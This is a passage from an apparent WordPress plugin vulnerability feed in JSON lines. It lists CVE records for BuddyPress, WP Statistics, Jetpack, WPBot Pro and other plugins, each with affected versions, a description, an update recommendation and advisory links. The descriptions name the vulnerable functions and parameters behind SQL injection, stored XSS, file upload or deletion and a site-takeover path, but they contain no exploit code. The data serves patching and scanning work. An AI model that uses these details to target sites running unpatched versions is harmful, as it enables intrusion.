version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4327f414-64f4-4193-a5c0-2a5ecdd75e11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4327f414-64f4-4193-a5c0-2a5ecdd75e11?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/buddypress\\\/buddypress\\\/blob\\\/master\\\/src\\\/bp-core\\\/bp-core-avatars.php#L1370\",\"name\":\"https:\\\/\\\/github.com\\\/buddypress\\\/buddypress\\\/blob\\\/master\\\/src\\\/bp-core\\\/bp-core-avatars.php#L1370\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/buddypress\\\/buddypress\\\/blob\\\/master\\\/src\\\/bp-core\\\/bp-core-avatars.php#L1270\",\"name\":\"https:\\\/\\\/github.com\\\/buddypress\\\/buddypress\\\/blob\\\/master\\\/src\\\/bp-core\\\/bp-core-avatars.php#L1270\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codex.buddypress.org\\\/releases\\\/version-14-2-1\\\/\",\"name\":\"https:\\\/\\\/codex.buddypress.org\\\/releases\\\/version-14-2-1\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173924\\\/buddypress\\\/trunk\\\/bp-core\\\/bp-core-avatars.php?contextall=1&old=3102524&old_path=%2Fbuddypress%2Ftrunk%2Fbp-core%2Fbp-core-avatars.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173924\\\/buddypress\\\/trunk\\\/bp-core\\\/bp-core-avatars.php?contextall=1&old=3102524&old_path=%2Fbuddypress%2Ftrunk%2Fbp-core%2Fbp-core-avatars.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3953","slug":"wp-statistics","versionImpact":"14.13.3","versionEndExcluding":"14.13.4","description":"The WP Statistics \u2013 The Most Popular Privacy-Friendly Analytics Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'optionUpdater' function in all versions up to, and including, 14.13.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary plugin settings.","recommendation":"Update to version 14.13.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-statistics\\\/tags\\\/14.13.2\\\/src\\\/Service\\\/Admin\\\/AjaxOptionUpdater.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-statistics\\\/tags\\\/14.13.2\\\/src\\\/Service\\\/Admin\\\/AjaxOptionUpdater.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283791\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283791\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07f7ef07-0f14-4b74-8d47-d5dece4954b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07f7ef07-0f14-4b74-8d47-d5dece4954b0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10858","slug":"jetpack","versionImpact":"14.0","versionEndExcluding":"14.1","description":"The Jetpack WordPress plugin before 14.1 does not properly check the postMessage origin in its 13.x versions, allowing it to be bypassed and leading to DOM-XSS. The issue only affects websites hosted on WordPress.com.","recommendation":"Update to version 14.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7fecba37-d718-4dd4-89f3-285fb36a4165\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7fecba37-d718-4dd4-89f3-285fb36a4165\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0955","slug":"wp-statistics","versionEndExcluding":"14.0","description":"The WP Statistics WordPress plugin before 14.0 does not escape a parameter, which could allow authenticated users to perform SQL Injection attacks. By default, the affected feature is available to users with the manage_options capability (admin+); however, the plugin has a setting to allow low privilege users to access it as well.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/18b7e93f-b038-4f28-918b-4015d62f0eb8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/18b7e93f-b038-4f28-918b-4015d62f0eb8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10075","slug":"jetpack","versionImpact":"13.7","versionEndExcluding":"13.8","description":"The Jetpack WordPress plugin before 13.8 does not ensure that the post created by the Contact Form is only accessible to authorised users, which could allow unauthenticated users to run arbitrary shortcodes and blocks.","recommendation":"Update to version 13.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a984976c-291a-4f68-90d4-e452605ea7d1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a984976c-291a-4f68-90d4-e452605ea7d1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3812","slug":"wpbot-pro","versionImpact":"13.6.2","versionEndExcluding":"13.7.0","description":"The WPBot Pro Wordpress Chatbot plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the qcld_openai_delete_training_file() function in all versions up to, and including, 13.6.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 13.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fe1609d-17d6-4afe-90b2-5473dc9b6c3b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fe1609d-17d6-4afe-90b2-5473dc9b6c3b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpbot.pro\\\/\",\"name\":\"https:\\\/\\\/www.wpbot.pro\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13091","slug":"wpbot-pro","versionImpact":"13.5.4","versionEndExcluding":"13.5.6","description":"The WPBot Pro Wordpress Chatbot plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'qcld_wpcfb_file_upload' function in all versions up to, and including, 13.5.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The exploit requires the ChatBot Conversational Forms plugin and the Conversational Form Builder Pro addon plugin.","recommendation":"Update to version 13.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f9b6979-2662-4d2f-9656-b880dd80832c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f9b6979-2662-4d2f-9656-b880dd80832c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpbot.pro\\\/\",\"name\":\"https:\\\/\\\/www.wpbot.pro\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12879","slug":"wpbot-pro","versionImpact":"13.5.5","versionEndExcluding":"13.5.6","description":"The WPBot Pro Wordpress Chatbot plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'qc_wp_latest_update_check_pro' function in all versions up to, and including, 13.5.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create Simple Text Responses to chat queries.","recommendation":"Update to version 13.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91427e3e-fedb-407e-8af6-8f4411a4166a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91427e3e-fedb-407e-8af6-8f4411a4166a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpbot.pro\\\/\",\"name\":\"https:\\\/\\\/www.wpbot.pro\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5413","slug":"image-horizontal-reel-scroll-slideshow","versionImpact":"13.3","versionEndExcluding":"13.4","description":"The Image horizontal reel scroll slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'ihrss-gallery' shortcode in versions up to, and including, 13.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 13.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28ba6f91-c696-4019-ae87-28ebfbe464cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28ba6f91-c696-4019-ae87-28ebfbe464cf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-horizontal-reel-scroll-slideshow\\\/trunk\\\/image-horizontal-reel-scroll-slideshow.php#L212\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-horizontal-reel-scroll-slideshow\\\/trunk\\\/image-horizontal-reel-scroll-slideshow.php#L212\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010834\\\/image-horizontal-reel-scroll-slideshow\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010834\\\/image-horizontal-reel-scroll-slideshow\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4392","slug":"jetpack","versionImpact":"13.3.1","versionEndExcluding":"13.4","description":"The Jetpack \u2013 WP Security, Backup, Speed, & Growth plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpvideo shortcode in all versions up to, and including, 13.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 13.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jetpack\\\/tags\\\/13.3.1\\\/modules\\\/videopress\\\/class.videopress-player.php#L335\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jetpack\\\/tags\\\/13.3.1\\\/modules\\\/videopress\\\/class.videopress-player.php#L335\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11dceac7-7ff8-4384-9046-919c38947c32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11dceac7-7ff8-4384-9046-919c38947c32?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5412","slug":"image-horizontal-reel-scroll-slideshow","versionImpact":"13.2","versionEndExcluding":"13.3","description":"The Image horizontal reel scroll slideshow plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 13.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 13.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08fb698f-c87c-4200-85fe-3fe72745633e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08fb698f-c87c-4200-85fe-3fe72745633e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-horizontal-reel-scroll-slideshow\\\/trunk\\\/image-horizontal-reel-scroll-slideshow.php?rev=2827121#L176\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-horizontal-reel-scroll-slideshow\\\/trunk\\\/image-horizontal-reel-scroll-slideshow.php?rev=2827121#L176\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985331\\\/image-horizontal-reel-scroll-slideshow#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985331\\\/image-horizontal-reel-scroll-slideshow#file1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13355","slug":"admin-and-client-message-after-order-for-woocommerce","versionImpact":"13.2","versionEndExcluding":"13.3","description":"The Admin and Customer Messages After Order for WooCommerce: OrderConvo plugin for WordPress is vulnerable to limited file uploads due to insufficient file type validation in the upload_file() function in all versions up to, and including, 13.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload files on the affected site's server which may make remote code execution possible and is confirmed to make Cross-Site Scripting possible.","recommendation":"Update to version 13.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3222601%40admin-and-client-message-after-order-for-woocommerce&new=3222601%40admin-and-client-message-after-order-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3222601%40admin-and-client-message-after-order-for-woocommerce&new=3222601%40admin-and-client-message-after-order-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82cee07d-871a-4579-aa53-ca0d14315458?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82cee07d-871a-4579-aa53-ca0d14315458?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4230","slug":"wp-statistics","versionEndExcluding":"13.2.9","description":"The WP Statistics WordPress plugin before 13.2.9 does not escape a parameter, which could allow authenticated users to perform SQL Injection attacks. By default, the affected feature is available to users with the manage_options capability (admin+); however, the plugin has a setting to allow low privilege users to access it as well.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0e40cfd-b217-481c-8fc4-027a0a023312\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0e40cfd-b217-481c-8fc4-027a0a023312\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5434","slug":"superb-slideshow-gallery","versionImpact":"13.1","versionEndExcluding":"13.2","description":"The Superb slideshow gallery plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 13.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 13.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985501\\\/superb-slideshow-gallery#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985501\\\/superb-slideshow-gallery#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/superb-slideshow-gallery\\\/trunk\\\/superb-slideshow-gallery.php?rev=2827170#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/superb-slideshow-gallery\\\/trunk\\\/superb-slideshow-gallery.php?rev=2827170#L127\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a12945d-a67c-4a19-a4e7-f65f5f2a21bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a12945d-a67c-4a19-a4e7-f65f5f2a21bb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6456","slug":"wp-facebook-reviews","versionImpact":"12.8","versionEndExcluding":"13.0","description":"The WP Review Slider WordPress plugin before 13.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 13.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30f31412-8f94-4d5e-a080-3f6f669703cd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30f31412-8f94-4d5e-a080-3f6f669703cd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2942","slug":"order-delivery-date","versionEndExcluding":"12.6.0","description":"The Order Delivery Date WordPress plugin before 12.6.0 discloses arbitrary post title (such as from draft and private posts) via an unauthenticated AJAX action, allowing attackers to retrieve such information","recommendation":"Update to version 12.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13a87567-2cf7-4bfb-8d63-a8e74950978f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13a87567-2cf7-4bfb-8d63-a8e74950978f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4892","slug":"buddypress","versionImpact":"12.5.0","versionEndExcluding":"12.5.1","description":"The BuddyPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018display_name\u2019 parameter in versions up to, and including, 12.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 12.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/113c154d-94a0-41da-a5ed-d9b2617e1c2c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/113c154d-94a0-41da-a5ed-d9b2617e1c2c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress\\\/tags\\\/12.4.1\\\/bp-members\\\/bp-members-blocks.php#L249\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress\\\/tags\\\/12.4.1\\\/bp-members\\\/bp-members-blocks.php#L249\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100815\\\/buddypress\\\/trunk\\\/bp-members\\\/bp-members-blocks.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100815\\\/buddypress\\\/trunk\\\/bp-members\\\/bp-members-blocks.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3974","slug":"buddypress","versionImpact":"12.4.0","versionEndExcluding":"12.4.1","description":"The BuddyPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018user_name\u2019 parameter in versions up to, and including, 12.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 12.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3657384e-025a-44ad-8b7e-1a2fea17dcc3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3657384e-025a-44ad-8b7e-1a2fea17dcc3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress\\\/trunk\\\/bp-members\\\/bp-members-blocks.php#L347\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress\\\/trunk\\\/bp-members\\\/bp-members-blocks.php#L347\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress\\\/trunk\\\/bp-members\\\/bp-members-admin.php#L145\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddypress\\\/trunk\\\/bp-members\\\/bp-members-admin.php#L145\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079691\\\/buddypress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079691\\\/buddypress\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2929","slug":"order-delivery-date","versionEndExcluding":"12.4.0","description":"The Order Delivery Date WordPress plugin before 12.4.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 12.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9299d8f-900b-4487-b135-b82946825e61\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9299d8f-900b-4487-b135-b82946825e61\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10515","slug":"squirrly-seo","versionImpact":"12.3.20","versionEndExcluding":"12.3.21","description":"While testing the SEO Plugin by Squirrly SEO WordPress plugin before 12.3.21, a vulnerability was found that allows a user with the Editor role to perform Stored XSS by embedding a malicious script, which can lead to account takeover or a persistent backdoor","recommendation":"Update to version 12.3.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/367aad17-fbb5-48eb-8829-5d3513098d02\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/367aad17-fbb5-48eb-8829-5d3513098d02\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0597","slug":"squirrly-seo","versionImpact":"12.3.15","versionEndExcluding":"12.3.16","description":"The SEO Plugin by Squirrly SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to and including 12.3.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 12.3.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a61a8d8b-f22f-4a16-95f6-6cf52cf545ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a61a8d8b-f22f-4a16-95f6-6cf52cf545ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023398\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023398\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2907","slug":"order-delivery-date","versionEndExcluding":"12.3.1","description":"The Order Delivery Date WordPress plugin before 12.3.1 does not have authorization and CSRF checks when importing settings. Furthermore, it lacks checks restricting the import to options that belong to the plugin. This allows attackers to set default_user_role to administrator and enable users_can_register, and then register as an administrator of the site for complete site takeover.","recommendation":"Update to version 12.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e513930-ec01-4dc6-8991-645c5267e14c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e513930-ec01-4dc6-8991-645c5267e14c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0260","slug":"wp-facebook-reviews","versionEndExcluding":"12.2","description":"The WP Review Slider WordPress plugin before 12.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9165d46b-2a27-4e83-a096-73ffe9057c80\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9165d46b-2a27-4e83-a096-73ffe9057c80\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2996","slug":"jetpack","versionEndExcluding":"12.1.1","description":"The Jetpack WordPress plugin before 12.1.1 does not validate uploaded files, allowing users with author roles or above to manipulate existing files on the site, deleting arbitrary files, and in rare cases achieve Remote Code Execution via phar deserialization.","refs":"[{\"url\":\"https:\\\/\\\/jetpack.com\\\/blog\\\/jetpack-12-1-1-critical-security-update\\\/\",\"name\":\"https:\\\/\\\/jetpack.com\\\/blog\\\/jetpack-12-1-1-critical-security-update\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/52d221bd-ae42-435d-a90a-60a5ae530663\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/52d221bd-ae42-435d-a90a-60a5ae530663\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5438","slug":"wp-image-slideshow","versionImpact":"12.0","versionEndExcluding":"12.1","description":"The wp image slideshow plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 12.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 12.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985394\\\/wp-image-slideshow#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985394\\\/wp-image-slideshow#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-image-slideshow\\\/trunk\\\/wp-image-slideshow.php?rev=2827205#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-image-slideshow\\\/trunk\\\/wp-image-slideshow.php?rev=2827205#L189\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e24383b-5b0f-4114-908b-4c2778632f73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e24383b-5b0f-4114-908b-4c2778632f73?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5437","slug":"wp-fade-in-text-news","versionImpact":"12.0","versionEndExcluding":"12.1","description":"The WP fade in text news plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 12.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 12.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4accf10-710e-4cba-8d61-04e422324f9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4accf10-710e-4cba-8d61-04e422324f9d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985398\\\/wp-fade-in-text-news#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985398\\\/wp-fade-in-text-news#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-fade-in-text-news\\\/trunk\\\/wp-fade-in-text-news.php?rev=2827202#L236\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-fade-in-text-news\\\/trunk\\\/wp-fade-in-text-news.php?rev=2827202#L236\",\"refsource\":\"MISC\",\"tags\":[]}]"}
